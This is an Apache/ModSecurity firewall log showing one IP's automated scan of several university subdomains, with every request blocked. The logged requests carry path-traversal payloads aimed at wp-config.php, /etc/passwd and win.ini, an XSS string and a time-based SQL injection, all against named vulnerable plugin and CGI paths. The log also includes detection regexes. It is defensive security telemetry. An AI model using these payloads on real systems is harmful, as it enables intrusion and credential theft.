[Tue Aug 29 11:41:32.353567 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:src: /scripts/simple.php/../../../../../../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php"] [unique_id "ZO12-MCo-f0AAAcbSIoAAAAv"]
[Tue Aug 29 11:41:32.390469 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:src: /scripts/simple.php/../../../../../../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php"] [unique_id "ZO12-MCo-f0AAAbo-Z0AAAAi"]
[Tue Aug 29 11:41:32.404089 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:src: /scripts/simple.php/../../../../../../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php"] [unique_id "ZO12-MCo-f0AAAaZ9vYAAAAo"]
[Tue Aug 29 11:41:32.405115 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:src: /scripts/simple.php/../../../../../../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php"] [unique_id "ZO12-MCo-f0AAAc0Nh8AAAAM"]
[Tue Aug 29 11:41:32.423414 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:src: /scripts/simple.php/../../../../../../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php"] [unique_id "ZO12-MCo-f0AAAUKhIAAAABC"]
[Tue Aug 29 11:41:32.522190 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:READ.filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:READ.filePath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/cgi-bin/operator/fileread"] [unique_id "ZO12-MCo-f0AAAcbSIwAAAAv"]
[Tue Aug 29 11:41:32.525062 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:READ.filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:READ.filePath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/operator/fileread"] [unique_id "ZO12-MCo-f0AAAaZ9vgAAAAo"]
[Tue Aug 29 11:41:32.526346 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:READ.filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:READ.filePath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/operator/fileread"] [unique_id "ZO12-MCo-f0AAAbo-Z8AAAAi"]
[Tue Aug 29 11:41:32.554841 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:READ.filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:READ.filePath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/operator/fileread"] [unique_id "ZO12-MCo-f0AAAcoNYsAAAAF"]
[Tue Aug 29 11:41:32.594820 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:READ.filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:READ.filePath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/operator/fileread"] [unique_id "ZO12-MCo-f0AAAUKhIQAAABC"]
[Tue Aug 29 11:41:33.387894 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:src: /scripts/simple.php/../../../../../../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php"] [unique_id "ZO12-cCo-f0AAAc0NiYAAAAM"]
[Tue Aug 29 11:41:33.444969 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: xss\\x22 onmouseover=alert(document.domain) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/main/calendar/agenda_list.php"] [unique_id "ZO12-cCo-f0AAAUKhIkAAABC"]
[Tue Aug 29 11:41:33.450658 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: xss\\x22 onmouseover=alert(document.domain) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/main/calendar/agenda_list.php"] [unique_id "ZO12-cCo-f0AAAcqJPwAAAAG"]
[Tue Aug 29 11:41:33.451199 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: xss\\x22 onmouseover=alert(document.domain) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/main/calendar/agenda_list.php"] [unique_id "ZO12-cCo-f0AAAQSWqUAAAA0"]
[Tue Aug 29 11:41:33.463732 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: xss\\x22 onmouseover=alert(document.domain) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/main/calendar/agenda_list.php"] [unique_id "ZO12-cCo-f0AAAcoNY0AAAAF"]
[Tue Aug 29 11:41:33.474000 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:READ.filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:READ.filePath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/operator/fileread"] [unique_id "ZO12-cCo-f0AAAcqJP0AAAAG"]
[Tue Aug 29 11:41:33.495643 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: xss\\x22 onmouseover=alert(document.domain) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/main/calendar/agenda_list.php"] [unique_id "ZO12-cCo-f0AAAcqJP4AAAAG"]
[Tue Aug 29 11:41:34.590305 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: xss\\x22 onmouseover=alert(document.domain) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/main/calendar/agenda_list.php"] [unique_id "ZO12-sCo-f0AAAcqJQkAAAAG"]
[Tue Aug 29 11:41:35.463889 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:param1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:param1: dummy' AND (SELECT 1 FROM (SELECT(SLEEP(5)))dummy)-- dummy"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/AurallRECMonitor/services/svc-login.php"] [unique_id "ZO12-8Co-f0AAAcbSJsAAAAv"]
[Tue Aug 29 11:41:35.516599 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:param1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:param1: dummy' AND (SELECT 1 FROM (SELECT(SLEEP(5)))dummy)-- dummy"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/AurallRECMonitor/services/svc-login.php"] [unique_id "ZO12-8Co-f0AAAcbSJwAAAAv"]
[Tue Aug 29 11:41:35.536030 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:param1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:param1: dummy' AND (SELECT 1 FROM (SELECT(SLEEP(5)))dummy)-- dummy"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/AurallRECMonitor/services/svc-login.php"] [unique_id "ZO12-8Co-f0AAAQkBgMAAAAC"]
[Tue Aug 29 11:41:35.559592 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:param1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:param1: dummy' AND (SELECT 1 FROM (SELECT(SLEEP(5)))dummy)-- dummy"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/AurallRECMonitor/services/svc-login.php"] [unique_id "ZO12-8Co-f0AAAUKhJwAAABC"]
[Tue Aug 29 11:41:35.559779 2023] [:error] [pid 1852] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:param1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:param1: dummy' AND (SELECT 1 FROM (SELECT(SLEEP(5)))dummy)-- dummy"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/AurallRECMonitor/services/svc-login.php"] [unique_id "ZO12-8Co-f0AAAc8A1QAAAAK"]
[Tue Aug 29 11:41:36.374834 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:UID: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/exportFile"] [unique_id "ZO13AMCo-f0AAAcbSJ8AAAAv"]
[Tue Aug 29 11:41:36.374841 2023] [:error] [pid 1852] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:UID: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/exportFile"] [unique_id "ZO13AMCo-f0AAAc8A1gAAAAK"]
[Tue Aug 29 11:41:36.376334 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:UID: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/exportFile"] [unique_id "ZO13AMCo-f0AAAcoNZ4AAAAF"]
[Tue Aug 29 11:41:36.378624 2023] [:error] [pid 1479] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:UID: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/exportFile"] [unique_id "ZO13AMCo-f0AAAXHqDEAAAAT"]
[Tue Aug 29 11:41:36.428074 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:za_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:za_file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/zip-attachments/download.php"] [unique_id "ZO13AMCo-f0AAAc0NjMAAAAM"]
[Tue Aug 29 11:41:36.468513 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:za_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:za_file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/zip-attachments/download.php"] [unique_id "ZO13AMCo-f0AAAcbSKIAAAAv"]
[Tue Aug 29 11:41:36.512457 2023] [:error] [pid 1479] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:za_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:za_file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/zip-attachments/download.php"] [unique_id "ZO13AMCo-f0AAAXHqDUAAAAT"]
[Tue Aug 29 11:41:36.555457 2023] [:error] [pid 1852] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:za_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:za_file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/zip-attachments/download.php"] [unique_id "ZO13AMCo-f0AAAc8A10AAAAK"]
[Tue Aug 29 11:41:36.556267 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:UID: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/exportFile"] [unique_id "ZO13AMCo-f0AAAcbSKQAAAAv"]
[Tue Aug 29 11:41:36.557514 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:za_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:za_file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/zip-attachments/download.php"] [unique_id "ZO13AMCo-f0AAAc0NjYAAAAM"]
